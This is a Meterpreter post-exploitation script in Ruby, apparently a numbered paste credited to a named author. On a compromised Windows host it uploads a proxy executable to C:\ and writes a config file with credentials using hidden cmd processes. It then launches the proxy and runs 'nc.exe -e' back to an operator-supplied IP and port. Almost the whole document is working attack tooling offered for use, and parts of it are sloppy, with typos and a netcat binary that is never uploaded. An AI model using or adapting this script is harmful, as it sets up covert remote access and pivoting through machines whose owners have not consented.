########################################################### Meterpreter Proxy

1. ##########################################################
2. # Meterpreter Proxy Script by zerocold.co.uk #
3. #Created By: Michael Johnson Email: mjog123@hotmail.com  #
4. ##########################################################
5. session = client
6. host,port = session.tunnel_peer.split(':')
7. #Files to upload to target host
8. file = File.join(Msf::Config.install_root, "data", "prox.exe")
9. #Menu-Options
10. @@exec_opts = Rex::Parser::Arguments.new(
11.  
12.                "-l" => [ true,   "Port To Listen On."],
13.                "-i" => [ true,   "Ip Reverse Connection"],
14.                "-u" =>  [ true,   "Username."],
15.                "-p" =>  [ true,   "Password."]
16.  
17. )
18. def usage
19.     print_line("    Meterpreter Proxy Script ZeroCold.co.uk")
20.     print_line("Michael Johnson  (Zero Cold)  mjog123@hotmail.com")
21.     print_line("#################################################")
22.     print_line
23.     print_line("Usage: proxy.rb  -i <ip> -l <port> -u <username> -p <password> ")
24.     print(@@exec_opts.usage)
25.     raise Rex::Script::Completed
26. end
27.  
28.   def upload(session,file)
29.     location = session.fs.file.expand_path("C:\\")
30.     fileontrgt = "#{location}\\prox.exe"
31.     print_status("Uploading Self Extracting Archive ...")
32.     session.fs.file.upload_file("#{fileontrgt}","#{file}")
33.     print_status("Upload Complete ...")
34.     return fileontrgt
35.  end
36.  
37.   def writefile(session,port,usr,pass)
38.     location = session.fs.file.expand_path("C:\\")
39.     print_status("Creating Command Local File")
40.     session.sys.process.execute("cmd /c echo [Connection] > #{location}\lps.ini" , nil,{'Hidden' => true,'Channelized' => true})
41.     session.sys.process.execute("cmd /c echo: >> #{location}\lps.ini", nil,{'Hidden' => true,'Channelized' => true})
42.     session.sys.process.execute("cmd /c echo port= #{port} >> #{location}\lps.ini", nil,{'Hidden' => true,'Channelized' => true})
43.     session.sys.process.execute("cmd /c echo: >> #{location}\lps.ini", nil,{'Hidden' => true,'Channelized' => true})
44.     session.sys.process.execute("cmd /c echo [Authorization] >> #{location}\lps.ini", nil,{'Hidden' => true,'Channelized' => true})
45.     session.sys.process.execute("cmd /c echo: >> #{location}\lps.ini", nil,{'Hidden' => true,'Channelized' => true})
46.     session.sys.process.execute("cmd /c echo User=#{usr} >> #{location}\lps.ini", nil,{'Hidden' => true,'Channelized' => true})
47.     session.sys.process.execute("cmd /c echo: >> #{location}\lps.ini", nil,{'Hidden' => true,'Channelized' => true})
48.     session.sys.process.execute("cmd /c echo Password=#{pass} >> #{location}\lps.ini", nil,{'Hidden' => true,'Channelized' => true})
49.  
50.     print_status("Local File Created ")
51.  
52.   end
53.  
54.   def excute(session,ip,port,usr,pass)
55.     location = session.fs.file.expand_path("C:\\")
56.     sleep 2
57.     session.sys.process.execute("cmd /c ""#{location}\\prox.exe", nil,{'Hidden' => true,'Channelized' => false})
58.     sleep 2
59.     print_status("Executing Proxy Server")
60.     session.sys.process.execute("cmd /c  #{location}\\nc.exe -e proxy.exe #{ip} #{port}", nil,{'Hidden' => true,'Channelized' => false})
61.     print_status("Proxy Started On Port #{port}")
62.     print_status("With User Name #{usr}")
63.     print_status("With Password #{pass}")
64.      
65.  
66. end  
67. ip=nil
68. port=nil
69. usr=nil
70. pass=nil
71.  
72. @@exec_opts.parse(args) { |opt, idx, val|
73.     case opt
74.  
75.         when "-l"
76.                  port = val
77.         when "-i"
78.                  ip = val
79.         when "-u"
80.                  usr = val
81.         when "-p"
82.                  pass = val
83.  
84.         end
85.  
86. }
87.  
88. if port
89. upload(session,file)
90. writefile(session,port,usr,pass)
91. excute(session,ip,port,usr,pass)
92. else usage
93. end